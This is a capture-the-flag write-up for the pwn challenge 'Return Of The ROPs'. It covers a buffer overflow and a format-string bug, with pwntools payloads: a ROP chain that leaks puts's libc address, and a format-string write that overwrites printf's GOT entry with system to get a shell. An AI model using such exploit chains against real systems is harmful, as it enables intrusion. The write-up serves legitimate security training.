# Return Of The ROPs
#### Description
Is ROP dead? God no. But it returns from a long awaited time, this time in a weird fashion. Three instructions ... can you pwn it?
#### Author
#### Points and solves
480 points, 55 solves.

This binary is a simpler version of pwn_inn. I recommend reading pwn_inn first before reading this one, I use some notation from pwn inn's writeup.

undefined8 main(void)
char local_28 [32];

puts("What would you like to say?");
return 0;

Buffer overflow and string format attack, there's nothing more we could ask for.

### Leaking libc:
payload = 40*b"A" + p64(pop_rdi) + p64(elf.sym.got["puts"]) + p64(elf.sym.plt["puts"]) + p64(elf.sym.main)
Simple ROP chain to leak ```puts``` address.
We don't have a libc version, so we use the website [libc database search](https://libc.nullbyte.cat/) to narrow down libc version based on known addresses.

## Getting shell:
We overwrite printf with system, in the same manner we did in pwn_inn, just instead using 3 batches, I used 2 batches and discarded the ```BBBB``` part because it's just uneccessary. (Because for both it's 0x007f.)

payload = b"%" + ("%05d"%l[0]).encode("ascii") + b"d%13$hn" +\
b"%" + ("%05d"%(l[1]-l[0])).encode("ascii") + b"d%14$hn"
payload += (0x28-len(payload))*b"A" + p64(ret) + p64(elf.sym.main)
for i in range(0,2):
if l[i] == third2:
payload += p64(elf.sym.got["printf"]+2)
if l[i] == third3:
payload += p64(elf.sym.got["printf"])

Send this payload and get shell :)

#### Flag

Original writeup (https://github.com/ElikBelik77/ctfs-writeups/tree/master/offshift/ret_of_rops).